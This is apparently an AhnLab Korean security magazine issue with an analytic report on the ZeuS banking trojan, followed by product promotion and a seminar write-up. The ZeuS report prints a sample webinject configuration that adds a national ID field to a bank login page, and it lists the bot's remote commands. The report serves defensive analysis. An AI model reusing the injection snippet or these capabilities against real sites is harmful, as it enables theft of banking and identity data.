21 SPECIAL REPORT 최악의악성코드심층분석및대응방안 / 전세계인터넷뱅킹의공포 ZeuS 최근사용자의온라인뱅킹계정정보를탈취하는제우스 (ZeuS) 가맹위를떨치고있다. 하루평균 300 개이상의샘플이발 견되는것으로알려진제우스와그에의해생성되는제우스봇 (ZeuS Bot, 또는 ZBot) 의전세계적인피해사례를살펴본다. 아울러제우스의주요기능과감염경로를추적하고대응책에대해서도알아본다. 제우스 (ZeuS) 는 2007 년러시아에서처음개발된것으로추정되는대표적인봇넷 (BotNet) 생성킷 (Kit) 으로, 제우스킷에의해생성된봇을 ZeuS Bot, 또는 ZBot 이라고부른다. 특히 2009 년하반기부터북미지역등에서금융거래증명서를훔치거나자동결제시스템, 급여시스템의비인증온라인거래를하는등의범죄의주범으로제우스봇이대두되면서전세계적으로가장유명한범죄소프트웨어가되었다. 다양한브라우저가타깃, 모바일환경까지위협제우스는인터넷익스플로러 (Internet Explorer) 뿐만아니라파이어폭스 (Firefox) 도대상으로하고있다. 이를통해피해자의 PC를원격으로제어하여자금송금을지시하거나계좌정보를절취하고 HTML 인젝션 (Injection) 공격과트랜잭션위 / 변조공격에도이용하고있다. 또한최근에는모바일환경으로까지그범죄영역을넓혀가는상황이다. 특히다양한보안솔루션이적용된국내인터넷뱅킹환경과는달리, SSL 기반의인터넷표준을사용하는해외인터넷뱅킹의보안기능으로는제우스방어가불가능하기때문에해외피해사례는앞으로도꾸준히증가할것으로예상된다. 제우스킷의현재최신버전은 x 버전이며, 언더그라운드에서약 3,000 ~ 4,000 달러에거래가되는것으로알려져있다. 또한추가비용을지불하면다양한확장기능을보유한모듈을추가로제공한다. 제우스제작자는제우스킷을개발, 판매하여수익을얻고, 제우스킷의구매자는이를이용해제우스봇을생성, 배포하여감염된좀비 PC를제어할수있는봇넷 (Bot Net) 을구성한다. 이렇게구성된봇넷을통해다양한개인정보등을수집하여판매하거나봇넷자체를판매함으로써사이버범죄의생태계를형성하게된다. [ 그림 1] 신종플루 (H1N1) 백신에대한내용을포함하는제우스봇스팸메일 ( 출처 : 인터넷진흥원 ) 다양한브라우저가타깃, 모바일환경까지위협 스팸메일을통한전파 제우스봇의전파경로는일반적인악성코드의전파경로와유사 하며, 그중가장많은부분을차지하는것이스팸메일이다. 스 팸메일을통해사용자를피싱사이트로유도하거나스팸메일에 첨부된파일을통해전파를시도한다. 소셜네트워크를통한전파 최근들어 SNS 가급속히발전하면서제우스의전파경로도트위 터나페이스북과같은소셜네트워크 (Social Network) 환경으로옮 겨가고있는추세다. 트위터나페이스북에중요한정보사이트로 위장한피싱사이트의링크를올려사용자의방문을유도한다. 악성스크립트를통한전파 상대적으로보안이취약한사이트를해킹하여악성스크립트를 삽입하는경우다. 악성스크립트나 PDF 취약점등을이용해사 용자가수동으로파일을다운로드받지않더라도자동으로 PC 에 악성코드가다운로드되어실행하도록한다. 악의적인 PDF 파일 을 iframe 으로삽입하거나악성스크립트를삽입하게되면사용자 21

22 가해당사이트를방문했을때특정 URL 로접근하여사용자가모르는사이에제우스봇이다운로드되어실행된다. 제우스의주요피해사례 2007 년미교통국의정보탈취에이용되기도했던제우스는미국과유럽등지에서수많은유포사례및금융피해사례가존재하며, 조직적인금융해커들이체포되는등큰피해규모나조직적인범죄로유명하다 년 6월, BOA, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek 등웹사이트의약 7만개 FTP 계정을이용하여유포되기도했으며, 같은해 10월에는페이스북에 150 만개의피싱메시지를전송해유포하기도했다 년 2월, 미국의한프로모션회사는제우스감염으로인한온라인뱅킹사기로 16만 4천달러 ( 약 1억 9천만원 ) 의피해를입고파산위기에놓이기도했다. 또한영국의한은행에서는 7월하순경제우스에감염된수십만개의 PC 등에서약 3,000 개의고객계좌를무단전송해약 90만달러에달하는고객예금이빠져나간것이발견되기도했다. 동유럽에있는서버에서이를조종한것으로조사되었다. 9월 30일에는제우스를이용해미국의중소기업이나지방자치단체은행계정에접근하여수백만달러를훔친국제금융해커 60 여명이기소되기도했다. 또한 10월에는미국에서우리돈으로약 2,450 억원에달하는천문학적인금액을훔치려한여성해커가경찰에붙잡혔다. 영국타블로이드신문 ' 더선 ' 의 ' 세상에서가장섹시한해커 (World's sexiest hacker)' 라는제목의기사를통해체포사실이알려진이여성해커는유럽네티즌들에게무작위로이메일을보낸뒤클릭한이용자의 PC에제우스를침투시켜금융계좌비밀번호를획득했고, 위조여권을이용한가짜계좌에돈을넣어두었다고밝혔다. 경찰은이여성해커의단독범죄가아닌, 범죄집단의돈세탁을위한운반책으로고용됐다고밝혀제우스를이용한금융사기가범죄집단을통해조직적으로행해진다는것을확인할수있었다. 제우스의구성및주요기능제우스빌더 (ZeuS Builder) 제우스빌더는제우스봇을생성하는툴이다. 제우스빌더에서생성되는제우스봇은매번다른형태의바이너리를가지는새로운악성코드가된다. 제우스빌더에서생성되는제우스봇파일과기능은 [ 표 1] 과같다. 파일명 주요기능 sdra64.exe 제우스봇의실행파일 local.ds 외부로유출할탈취된정보를저장하는파일 user.ds 계정정보탈취대상웹사이트목록의설정파일 [ 표 1] 제우스빌더에서생성되는제우스봇파일 [ 그림 3] 제우스빌더 제우스어드민 (ZeuS Admin) 제우스어드민은제우스 C&C(Command and Control) 서버의관리페이지이다. 웹으로지원하며제우스봇에감염된좀비 PC를관리하고수집된정보들을포함한봇넷의상황을한눈에모니터링할수있다. 또한계정별로권한관리가가능하다. [ 그림 4] 제우스어드민 제우스봇의기능 제우스빌더로생성된 ZBot, 즉제우스봇은다음과같은역할을 수행한다. [ 그림 2] 영국타블로이드신문 ' 더선 ' 에보도된여성해커 시스템정보수집기능 제우스에감염된좀비 PC 로부터 PC 의시스템정보를수집한다. 제우스봇이수집하여 C&C 서버로전송하는정보는다음과같다. 22

23 ZeuS Bot 정보 ( 봇넷이름, Bot ID, Bot Version 등 ) 운영체제버전및언어 지역및시간 IP 주소 실행중인프로세스이름 거래정보 / 개인정보수집기능 제우스봇에감염된좀비 PC 를통해사용자가 user.ds 파일에 저장된 URL 에접속할경우, 사용자의모든입력값들을저장하 여 C&C 서버로전달하는기능이다. 제우스봇의핵심기능으로, 이기능으로때문에해외인터넷뱅킹에서제우스로인한피해 가이슈가되고있다. 제우스봇에서입력값들을가로채는기 능은크게 2 가지다. 1. 주요 API 후킹 웹브라우저를통해서버로전달되는입력정보를가로챈다. 특히 표준 SSL 을채택하고있는해외인터넷뱅킹환경에서는윈도우 에서제공하는 HttpSendRequest 와같은 HTTP 관련함수를후킹 할경우에는입력정보가암호화되기전에노출될수밖에없다. 2. 화면캡쳐 가상키보드를사용할경우에입력정보를가로채기위한기능이다. 마우스왼쪽버튼클릭시마우스포인터를기준으로일부크기의 영역을화면캡쳐함으로써가상키보드의입력값을가로챌수있다. 웹인젝션 (Web Injection) 기능 대부분의온라인뱅킹등웹사이트들은키로깅 (keylogging) 공격 이나네트워크 - 스니핑 (network-sniffing) 공격을회피하기위해보 안성을강화하고있다. 그러다보니이제사용자의정보를탈취 하는공격은 HTML 인젝션기술을이용하여이를우회하고있다. HTML 인젝션공격은실제정보가네트워크로전송되기전에사 용자가보게되는웹화면을변조하는것으로, 일반적인키보드 보안이나네트워크보안등의기법으로는대응하기어렵다. 제우 스는이러한 HTML 인젝션공격을쉽게할수있으며, 구성파일에 몇줄을추가하여간단히공격할수있다. 예를들어아래와같이 원래 ' 성명 ' 과 ' 전화번호 ' 만입력하는웹페이지를제우스를통해 변조하여그사이에 ' 주민번호 ' 를입력하도록변경할수있다. 변 set_url GP data_before name=' 성명 '</tr> data_end data_inject <tr><td> 주민번호 :</td><td><input type="text" name="p_number" id="p_ number"/></td></tr> dataend data_after data_end [ 그림 5] 제우스의 HTML 인젝션공격코드예시 조된사실을모르는사용자가 ' 주민번호 ' 를입력하게되면이정보는 C&C 서버로전송된다. 부가기능지금까지언급된기능외에 C&C 서버를통해추가적으로다음과같은여러가지명령을수행하도록할수있다. 컴퓨터리부팅및셧다운명령시스템파일삭제명령특정 URL 접속에대한차단 / 허용특정파일의다운로드및실행 PC 내의특정파일실행 (UI 를안보이게실행가능 ) PC 내의파일 / 폴더검색및전송디지털인증서탈취보호된저장영역과쿠키를통한정보탈취제우스의 Configuration file 업데이트제우스봇실행파일의파일명변경인터넷익스플로러의시작페이지변경등제우스확장모듈의주요기능제우스에서추가로제공하는확장모듈은별도로구매를해야하며, 각모듈별주요기능은 [ 표 2] 와같다. 모듈주요기능추가금액 ($) Back connect Firefox form grabber Jabber(IM) chat notifier 좀비 PC를직접접속하여인터넷뱅킹거래를수행할수있는기 1,500 능을제공함좀비 PC를직접접속하여인터넷뱅킹거래를수행할수있는기 2,000 능을제공함사용자가인터넷뱅킹사이트에로그인할때실시간으로정보를가 500 로채서알려주는기능을제공함 VNC Private module VNC 프로토콜을이용해좀비 PC를제어하는기능을지원함 10,000 Windows 7/Vista Support 제우스의기본버전은 XP만으로제한되지만이모듈을추가할경 2,000 우 Windows 7/Vista 를지원함 [ 표 2] 제우스확장모듈별주요기능 글로벌유명보안업체들, 대응책없어고심중제우스는해커의의도대로가공및변형, 생산이간편한패키지로구성되어있으며, 온라인을통해비교적쉽게구할수있다. 심지어제우스패키지의빌더에서버튼하나를클릭할때마다변형된제우스봇이생성되기도한다. 이러한이유로제우스봇은매우유행하고있으며, 기하급수적으로늘어나는변종에글로벌유명안티바이러스업체들도마땅한대응책은없는상황이다. 글로벌안티바이러스업체들은꾸준히수집되고있는제우스봇의변종들을분석하여엔진업데이트를하고있다. 또한이들의 C&C 서버를추적하여해당서버로의접속을차단하는등발빠르게움직이고있으나한외국의사이트의통계에따르면 40.2% 정도만검출해내는실정이다 ( 참고 ). 따라서제우스봇대응은이러한안티바이러스업체들의검출과삭제 / 치료에의한대응보다는금융거래전문보안업체들을중심으로사용자정보의거래트랜잭션을보호하여제우스의행위로부터입력 / 전송되는정보들을보호하는방안이검토되고있다. [ 그림 6] 제우스에의해변조된웹페이지예시 23

24 안철수연구소, AOS 로씨티은행인터넷뱅킹보안강화 글로벌통합보안기업안철수연구소 ( 대표김홍선 는최근한국씨티은행 ( 은행장하영구, www. citibank.co.kr) 의차세대온라인뱅킹시스템에자사의온라인통합보안서비스인 ' 안랩온라인시큐리티 (AhnLab Online Security, 이하 AOS)' 를공급및구축을완료했다. 이번씨티은행의시큐어브라우저환경구축및 AOS 전제품의도입은증권사에이어은행권최초로이루어진것으로, 단일보안서비스로모든형태의인터넷뱅킹보안위협에선제적으로대응하는시스템을구축한첫사례라는데서의미가크다. 한국씨티은행은최근인터넷뱅킹서비스가활성화되고이를노리는보안위협이증가함에따라인터넷뱅킹보안을강화하기위한시스템고도화를위해꾸준히노력해왔다. 그일환으로메모리해킹, 웹페이지변조등각종해킹시도를차단하는보안전용브라우저인 'AOS 시큐어브라우저 (Secure Browser)' 와키보드보안프로그램인 'AOS 안티키로거 (Anti-keylogger)', 백신프로그램인 'AOS 안티- 바이러스 / 스파이웨어 (Anti-virus/spyware)' 를도입했다. 또한이번프로젝트에서는기존에사용하고있던강력한방화벽프로그램인 'AOS 파이어월 (Firewall)' 의통합작업도함께이루어졌다. 이번 AOS 의도입으로씨티은행의인터넷뱅킹사용자는더욱안전한환경을보장받고, 은행은인터넷거래의신뢰성을높이게되었다. 특히 AOS 시큐어브라우저는할당된메모리영역에대한외부모듈로부터의접근을방지하고악성코드의디버깅과메모리접근을방지및보호 (protection) 하는별도의보안전용브라우저로, 최근해외에서화제가되었던제우스 (ZeuS) 및기타변종에의한공격, 해킹시도를원천적으로차단해한단계높은차원의사용자보안을제공할예정이다. 김홍선대표는 ' 인터넷뱅킹이점점활발해지고있는가운데, 악성해커들의개인정보탈취시도도더욱증가할것으로예상된다. 안철수연구소의 AOS 는특허받은기술력을바탕으로, 기존의 AV 제품과차별화된인터넷뱅킹전용보안을제공해점점고도화, 지능화되고있는인터넷뱅킹보안위협에근본적으로대응할수있다 ' 고전했다. 한편, AOS 는 'AOS 시큐어브라우저 ', 'AOS 안티키로거 ', 'AOS 파이어월 ', 'AOS 안티- 바이러스 / 스파이웨어 ' 로구성되어있으며, 다양한보안기능이통합된전방위온라인금융거래보안솔루션이다. 키보드, PC, 웹브라우저및메모리등악성코드침투와해킹이가능한모든통로를봉쇄함으로써사용자의정보침해를원천적으로막아준다. 사용자가다양한보안기능을단한번의설치로이용할수있다는것이장점이다. 안랩온라인시큐리티 (AhnLab Online Security), 전방위온라인금융거래보안지원 안철수연구소는제우스에대해안티바이러스제품인 V3 를통 해신속하게대응하고있지만, 수집되지않은제우스의샘플이 나새로운변종에대응하기위해트랜잭션보안전문솔루션인 AhnLab Online Security( 이하 AOS) 의기술을이용하고있다. AOS 는전용보안브라우저인 AOS 시큐어브라우저 (Secure Browser) 와키보드보안을위한 AOS 안티 - 키로거 (Anti-keylogger), 해킹툴 차단및네트워크침입차단을위한 AOS 파이어월 (Firewall) 등다 양한보안기능이통합된전방위온라인금융거래보안솔루션 이다. 이를통해 AOS 는제우스의해킹행위자체를차단하거나 사용자의입력정보를보호하여제우스로인한사용자의정보침 해를원천적으로막아준다. AOS 는먼저 AOS 파이어월을통해이 미진단이가능한제우스봇의실행을차단한다. 또한 AOS 시큐 어브라우저와 AOS 안티 - 키로거를통해웹페이지의로그인정 보탈취방어, HTML 인젝션및스크린캡쳐 (Screen Capture) 를 방어한다. 한편, 제우스의피해를최소화하기위해다음과같은사전예방이요구된다. 스팸메일주의현재까지발견된제우스봇은영어로작성된스팸메일을기반으로배포되고있기때문에출처가불분명한영어메일의링크를클릭하여방문하거나첨부파일을실행해서는안된다. 보안업데이트 MS 및 Adobe 의보안업데이트를항상최신버전으로적용해야한다. 또한백신프로그램의엔진을최신업데이트로유지해야하며실시간감시기능을활성화해야한다. 보안제품적용안랩사이트가드 (AhnLab SiteGuard) 를설치하면웹을통한악성코드유입을사전에차단할수있다. 이외에도온라인을통한개인정보입력시이용자들의신중한태도가필요하며, 평소철저한비밀번호관리등을통해제우스로인한피해를사전에방지하거나최소화하기위한노력이중요하다. 24

25 세미나지상중계 보안관제고객세미나 /11 빠르게변화하는위협양상보안관리자는괴롭다? 안철수연구소, 최신보안위협에대한기업보안관리의해법제시고객사관계자 100 여명참석해안랩보안관제서비스에뜨거운관심보여 안철수연구소는지난 10 월 6 일그랜드인터콘티넨탈호텔카네이션룸에서보안관제고객초청신규서비스설명회를열었다. 이날행사는국내최초로정보 보안서비스를선보인선두기업으로서안철수연구소가노하우와 20 년간축적된기술을고객들과공유하는시간으로진행됐다. 급변하는 IT 패러다임과그 에따른위협양상을하나라도놓치지않으려는참관객들이보여준높은집중도로열기가뜨거웠던현장을지금부터들여다본다. 이례적으로고객들의관심과요청으로개최된이번안철수연구소보안관제고객초청신규서비스설명회는기조연설을포함해총 5개의발표세션과실제고객사례발표로진행됐다. 보안관제고객사관계자약 100 여명이참석한가운데안철수연구소김홍선대표가기조연설을통해이날설명회의시작을알렸다. 급변하는 IT 패러다임과보안이슈 김홍선대표는아이폰과아이패드등애플사가주도하고있는 IT 기기트렌드를비롯해다양한소셜네트워크, 클라우드컴퓨팅등최근 IT 패러다임의변화와이에따른보안이슈를언급했다. 특히최근제우스 (Zeus) 로대표되는해킹의브랜드화및상품화를설명하고 " 악성코드트렌드의변화에따른입체적인대책마련이중요하다 " 고강조했다. 또한김홍선대표는 " 공격의양상이네트워크를비롯해엔드포인트, 웹, 트랜잭션에이르기까지입체적으로이루어지고있다 " 며, 이에대한대책으로엔드포인트및네트워크기반제품의악성코드제거는물론보안관제, 컨설팅등보안서비스를통한안철수연구소의입체적인대응프로세스를제시했다. 두번째발표자로나선보안관제팀윤삼수팀장은우선제로데이취약점과타겟공격부터최근이란원전을감염시킨 ' 스턱스넷 (Stuxnet)' 까지올한해의 10가지주요보안이슈들과위협전개양상을설명했다. 아울러이러한위협에대한방어가어려운이유로인터넷개방성및표준화, 인터넷시스템의복잡성증가, 악성코드와해킹기술의발달및인터넷을통한악성코드, 해킹툴의유포등을들었다. 윤삼수팀장은 " 이러한위협에대해수집, 분석, 대응에이어사후조치까지종합적인위협대응프로세스가필요하다 " 며 " 솔루션에서그치는것이아니라서비스와보 안인프라강화에이르는입체적인대응이필요하게되었다 " 고강조했다. 안랩보안관제서비스의새이름, AhnLab Sefinity 사업기획팀의신호철팀장은 ' 안랩보안관제현황및서비스로드맵 ' 에관해발표하고 AhnLab Sefinity 서비스에대해설명했다. 신호철팀장은특히 " 안철수연구소의보안관제서비스의새이름인 Sefinity 는 Security beyond Infinity, 즉보안, 그이상의보안이라는보안관제서비스의의미 " 라고설명하고 "3P 전략을통한안철수연구소만의차별화된보안관제서비스제공하고있다 " 고말했다. 3P 전략이란 Preventive( 사전예방활동 ), Proactive( 능동적인보안활동 ), Personalized( 개별화된서비스 ) 를제공한다는안철수연구소보안관제서비스의핵심이다. 두시간여에걸쳐전반적인 IT 및보안이슈에관해살펴본 1부를 25

26 마치고잠시쉬어가는시간이마련됐다. 대부분의참관객들은행 사장외부에마련된제품시연테이블앞에모여들어다양한제 품의구동및기술구현의실제모습을꼼꼼하게살펴보거나곳 곳에서시연자들을에워싸고즉석에서문답시간을갖는등뜨거 운관심을보였다. 보안관리자의골칫거리해결, AhnLab Sefinity WebShell 탐지서비스 잠시후이어진설명회 2 부는사업기획팀이상구차장의 ' 웹쉘 (WebShell)' 로대표되는최근의웹위협에대한설명과대응책인 안철수연구소의 ' 사이트케어 (SiteCare)' 소개로시작됐다. 이상구 차장은우선다양한웹위협의심각성의예를설명하고 " 웹위협 은단순한비용의문제가아니라법적, 윤리적문제 " 라며 " 기업의 비즈니스는물론, 기업의생존과도연결된다 " 고말했다. 또한 " 기 존보안대책으로는반복적인문제가발생하는것을막을수없 다 " 며 " 기존의패킷위주의검사가아니라실제소스위주의검 사, 그리고행위기반의탐지가필요하다 " 고설명했다. 특히실제 보안관리자들의실제고민을예로들고, 보안관리자의측면에 서탐지및제어가어려운웹쉘에대해소개하자참관객들의집 중도가더욱높아졌다. 이상구차장은 " 올해초까지관제사고와 관련해거의 100% 가웹쉘에의한사고 " 라며 " 그러나웹쉘은기존 보안솔루션으로는탐지가불가능하고, 웹방화벽도웹쉘공격을 탐지하지못하며자동화탐지기능인일반백신으로도웹쉘의스 크립트는탐지할수없다 " 고설명했다. 또한 " 소스코드를직접검 사할필요가있어웹쉘은일반인 ( 비보안전문가 ) 들이정탐또는 오탐을판단하기가어렵기때문에보안전문가수준의지식이필 수 " 라며 " 특히원스톱으로통합관리되지않으면효과적으로웹쉘 을차단하기가어렵다 " 고말했다. 이러한웹쉘대응책으로 ' 사이트케어 (SiteCare)' 를소개한이상구 차장은 " 사이트케어는 URL 크롤링을통해웹사이트에악성코드 가있는지확인하여조치방안까지상세하게보고할뿐만아니라 콘텐츠에묻어있는스크립트를분석하고실제악성코드를시뮬레 이션해보기때문에오탐이없다 " 고설명했다. 또한 " 사이트케어 는포괄적이고전반적인콘텐츠에대한탐지로전반적인보안서 비스를제공하기때문에보안관제담당자들뿐만아니라웹서버 관리자나보안관리자들에게도반응이좋다 " 고말했다. 이상구차 장의설명에따르면사이트케어에는안철수연구소가세계최초로 개발한 Anti-MalSite Engine 이탑재되어있어난독화된악성요소 를분석할수있으며, 외부서버로링크되어있는스크립트까지 진단이가능하다. 또한날로복잡해져가고있는 HTML 구조에서도 어느위치에악성요소가존재하는지정확히분석한다. 따라서 보안관제요원뿐만아니라웹서버관리자나보안관리자들도쉽 게웹의악성요소를제거할수있다는것이다. 이상구차장은 " 안철수연구소는기본도잘하고변화하는위협에 대응하여신규서비스발굴을위한노력도게을리하지않고있 다 " 며 " 관리자들의고민해결을위해노력하고있다 " 는말로발표 를마무리했다. AhnLab Sefinity SiteCare 서비스로보안관제의고도화 마지막발표로 CERT 팀곽희선차장의 ' 효과적인 Sefinity 활 용방안및사례 ' 가이어졌다. 곽희선차장은 "Sefinity 포털은 ESM(Enterprise Security Management) 과 RM(Risk Management) 의 요소들을관제에편리한방향으로모은것 " 이라고설명하고 " 다양 한방법으로분석할수있도록시스템이되어있다 " 고말했다. 또 한 "Sefinity 는관제를고도화하는작업을진행한다 " 며 " 위협을해 킹단계별로세분화하여정보수집의목적인지, 공격의목적인지, 혹은공격성공후의반응인지를분류한다 " 고설명했다. 이어관 리자가 Sefinity 의보고서를받아보고무엇을어떻게해야하는가 에관해 " 안랩기준의자체분석에따른위험도분석하는데 low 의 경우에는참고만하시면되겠지만 high 의경우에는즉각적인대 응이필요하다 " 며 " 조치한내용, 대응방안에대해고객들께서유 의해서보시고내부적으로취해야할행동을해야할경우도있 다 " 고말했다. 한편활용사례와관련해 " 관제요원에따라전달되 는정보가차이가난다는고객의견이있었다 " 며 " 점검, 이벤트로 그, 점검방법가이드등표준적으로대응할수있는상세한가이 드를마련했다 " 고밝혔다. 또한실제 IDS 이벤트를보고있는고 객사의경우탐지된이벤트대비티켓발생비율이나보고된건이 적다고말하는일부고객이있었다는점도언급한뒤, 그러나 " 절 대이벤트를놓치고있지않다 " 고강조했다. 곽희선차장은 " 실제 위험성이있는공격에대해서모니터링중이며, 해당공격이벤 트를놓치지않기위해서시나리오및다이내믹필터와같은장 치들을통해서모니터링을진행하고있다 " 고설명하고 " 무엇보다 앞서언급한것처럼보고서에기록된조치한내용, 대응방안에 대해서는꼭살펴보고필요한조치가취해질수있도록해주셨으 면좋겠다 " 는당부도있지않았다. 보안관제를통한입체적인보안 참관객들의높은관심속에서숨가쁘게진행된이날설명회는시 26

27 S u c c e s s S t o r y 고객사례 조양현다음커뮤니케이션기업정보보호팀과장 "AhnLab Sefinity SiteCare 로악성코드급감, 더이상의 삽질 은없다." 자릿수가달라졌을만큼악성코드급격히감소 악성코드가이렇게적은데계속사용할필요가있냐는웃지못할반응도있어 안철수연구소보안관제고객초청신규서비스설명회에서참관객의많은관심을끌었던발표중하나는다음커뮤니케이션기업정보보호팀조양현과장의 AhnLab Sefinity SiteCare 고객사례발표였다. 같은보안관리자로서, 또는같은사용자의입장에서실제경험담을들어보는것은흔치않은기회인데다보다실질적인정보와판단에도움을얻을수있기때문일것이다. 조양현과장은 " 사이트케어 (SiteCare) 도입전까지내부적으로우려와이슈가많았다 " 면서 " 이자리를빌어커스터마이징이잘되도록도와준안랩의관계자여러분께감사를표한다 " 는말로발표를시작했다. 조양현과장은다음커뮤니케이션이제공하는서비스내의악성게시물과관련해 " 갈수록동적콘텐츠나이모티콘삽입등이많아지면서아름다운 ( 화려한 ) 게시물의형태를하고있다 " 며게시물을통한지능적인악성코드유포가급증하고있다고밝혔다. 이어이러한게시물내의악성코드를차단하기위한노력과관련해 " 상상할수있는범위에서다적용해봤지만효과가없었다 " 고사이트케어서비스도입전의상황을설명했다. " 특히수동탐지, 파악으로엄청난업무소모량으로관리자의부담은커지고다른업무를수행할수도없을지경에이르렀다 " 며 " 농담삼아 ' 네버엔딩삽질 ' 이라고할정도였으며자동화할방법은요원하다는결론에도달했다 " 고말했다. 특히서비스특성상악성코드로판단하고게시물을삭제했는데게시자가악성코드가아니라고항의하거나적반하장으로악성코드인지는상관없이자신에게중요하기때문에보관하는것이라며항의하는경우가있어특별한삭제근거를마련할필요가있었다고설명했다. 또한 " 바로차단하지않으면히트 (hit) 수가많은사이트의경우악성코드전파가일파만파로커진다 " 며 " 반드시실시간성의보장이필요하다 " 고강조했다. 이어사이트케어를도입하게된과정을설명하며 " 처음에지인으로부터소개받았을때는기존의악성코드 DB와차이가없을것으로생각했다 " 며 " 타사와동일한수준의 DB라면데이터신뢰성이떨어진다고생각했다 " 고말했다. 또한사이트케어의도입을결정하는과정에서각각의서비스팀간의내부적인이슈와법적규제강화라는외부적인이슈등으로결정이쉽지않았으며, 특히악성게시물을리디렉트해보류하는정책을마련하는데만도꽤오랜시간이걸렸다고설명했다. 그러나천만명이상의사이트가드사용자들을통해형성된 DB라는말을듣고도입을결정했다는조양현과장은 " 도입후에는악성코드수의자릿수가달라졌을만큼급격한감소를보였다 " 고말했다. 또한 " 더불어고객보호의효과와법률에대한적극적인대응을할수있었을뿐만아니라수동탐지에따른소모적인리소스를보완하고많은부분을자동화한계기가됐다 " 고밝혔다. 실제로사이트케어를사용하고있다는 ' 인증샷 ' 캡처도제시하는센스 (?) 를보여준조양현과장은 " 악성코드수가급격히줄어들자임원진사이에서는악성코드가이렇게적은데서비스를계속이용할필요가있냐는웃지못할반응까지나타났다 " 고덧붙였다. 한편조양현과장은오해를피하기위해사이트케어의단점도언급해야겠다며 " 사이트케어가단순작업이나리소스를극적으로많이줄여주는것은맞지만자동화시스템에대한맹목적인신뢰는경계해야한다 " 고말했다. 또한 " 사이트케어로악성코드의위협에서완전히벗어나는것은아니다 " 며웹위협의근본적인특성을다시한번주지시키는한편관리자들의주의와노력을강조했다. 작과마찬가지로김홍선대표가마무리했다. 김홍선대표는이날행사에서발표된전반적인내용을정리하고 " 다양한기기들과애플리케이션등으로의접근성요구가높아지고사용성이증가하고있는것이전세계적인트렌드 " 라며 " 정보가소셜네트워크 (Social network) 로바로들어오는체제 " 라고말했다. 특히 " 지축이흔들리는변화 " 라는표현으로급변하는 IT 트렌드의변화, IT 활용성측면에서의변화를강조했다. 이와더불어악성코드의위협양상또한급변하고있다고설명하고, 특히 " 지능적인악성코드는지능적인범죄를가능하게하고투자대비효과가크다 " 며 " 이러한트렌드에맞춰입체적인보안이필요하다 " 고말했다. 또한 최근의위협은기존의솔루션으로는더이상막을수없다며이는 " 촌각을다투는이슈 " 라고강조했다. 이와관련해 " 안철수연구소는악성코드분석팀이바로옆에있다 " 며신속한대응을약속하는한편, " 여러분의서비스가안전하고편리하게운영될수있도록커스터마이징해드릴것 " 이라고덧붙였다. 끝으로김홍선대표는 " 여기계신보안담당자들과파트너로서서로의전문성을공유 (sharing) 하고싶다 " 고말하고 " 특히우리가보안관제분야에굉장히포커스 (focus) 를두고있다는것을알아주셨으면좋겠다 " 는말로이날보안관제고객초청설명회를마무리했다. 27

28 SOLUTION REVIEW AhnLab Sefinity 집중분석 /11 보안관제서비스의모든것! AhnLab Sefinity 꼼꼼하게뜯어보기 기업의웹사이트서비스를다운시키는 DDoS 공격을비롯해최근에는시설망자체를노리는스턱스넷까지나날이고도화되고심각해지는위협에기업비즈니스의어려움이가중되고있다. 이미상당수의기업들이보안위협에대응하기위해보안시스템을도입한상태지만관련지식이나기술부족, 또는인력부족등다양한이유로보안시스템을효율적으로운영하지못하는경우가허다하다. 이와관련해기업보안관리자의부담은물론. 임원진의고민을단번에해결해줄안철수연구소의보안관제서비스 AhnLab Sefinity 에관한모든것을꼼꼼히짚어보도록하자. AhnLab Sefinity 가뭔가요? AhnLab Sefinity 는안철수연구소보안관제서비스의 BI(Brand Identity) 입니다. 'Sefiity' 는 'Security beyond Infinity' 의합성어로, ' 보안, 그이상의보안 ' 이라는의미로풀이할수있습니다. 즉, IT보안그이상의서비스를제공하고자하는안철수연구소의의지가담겨있습니다. 보안시스템을도입하였으나운영이부담스러운기업날로복잡해지는침해에대응하기위해서보안시스템을도입했지만보안 / 해킹, 보안시스템운영에대한지식의부족, 또는기타의이유로보안시스템을효율적으로운영하고있지못하고있는기업이라면안철수연구소 Sefinity 보안관제서비스를통해기업의보안시스템을효율적으로운영할수있습니다. 그럼 ' 보안관제서비스 ' 란무엇인가요? 보안관제서비스, 또는 MSS(Managed Security Services) 란기업의일상적인 IT정보보안업무를효율적이고효과적으로수행하기위해일회성이아닌지속적으로보안전문가또는보안전문기업에게위탁하는 IT서비스입니다. 이러한측면에서보안관제서비스업체는고객사에위치한보안시스템을대상으로 24시간모니터링, 정책설정, 침입시도에대한탐지, 분석, 대응등기업에서지속적으로수행되어야하는일련의보안시스템운영업무를고객사로부터위탁받아서비스하는형태로제공합니다. 비용문제로보안시스템도입이꺼려지는기업보안시스템도입을고려중이지만예산및비용이부담스러운기업이라면이용한기간만큼서비스요금을지불하는방식의보안관제서비스를도입하여보안시스템도입및운영에소요되는비용절감의효과를가져올수있습니다. 자체적으로보안인력및보안조직을보유하기어려운기업상대적으로규모가작은기업의경우, 자체적으로보안인력또는보안조직을보유하기가쉽지않습니다. 보안관제서비스는고객사의보안시스템운영을대신맡아주기때문에기업의조직운영에부담이줄어듭니다. 어떨때보안관제서비스가필요할까요? 급변하는 IT 패러다임과더불어보안위협또한나날이급증하고있을뿐만아니라고도화, 입체화, 조직적범죄화의양상을보이고있습니다. 이러한상황에서상당수의기업들은보안제품을도입하고도이러한위협에대응하는데어려움을느끼는경우가많습니다. 때문에보안관제서비스는특히다음과같은기업에필요합니다. 잦은침해사고에대해상시대응이어려운기업침해사고는시간을가리지않고발생합니다. 언제발생할지모르는침해사고에대응하기위해상시대응인력보유가필수적입니다. 보안관제서비스는 24시간, 365 일고객의보안시스템을모니터링하며침해사고발생시에언제라도즉각대응할수있도록상시대응조직을운영하고있어침해사고로인한피해를최소화할수있습니다. 28

29 Managed Security Services Managed Security Services Professional Services Misc. Service Managed Firewall Service Managed IDS/IPS Service Managed UTM Service Managed WEB App. Firewall Service DDoS Protection Service WebShell Detection Service SiteCare Service Vulnerability Assessment Service Incident Response Service Penetration Test Service Anti-Spam Service Mail Security Service AhnLab CERT & ASEC <AhnLab Sefinity 보안관제서비스구성도 > 기업이자체적으로보안시스템을도입하는경우보안시스템운 영, 환경설정, 보안정책설정, 침입대응등보안시스템운영과관 련된일련의활동을모두고객이직접수행하여야합니다. 반면 보안관제서비스는보안시스템도입부터운영에관한일련의활 동을전문업체의노하우와책임하에운영할수있기때문에보다 전문적인보안환경구축이가능하며리소스낭비를막을수있습 니다. 보안시스템을도입하는것과보안관제서비스를이용하는것은어떤차이가있나요? 보안관제서비스를이용하면무엇이좋은가요? 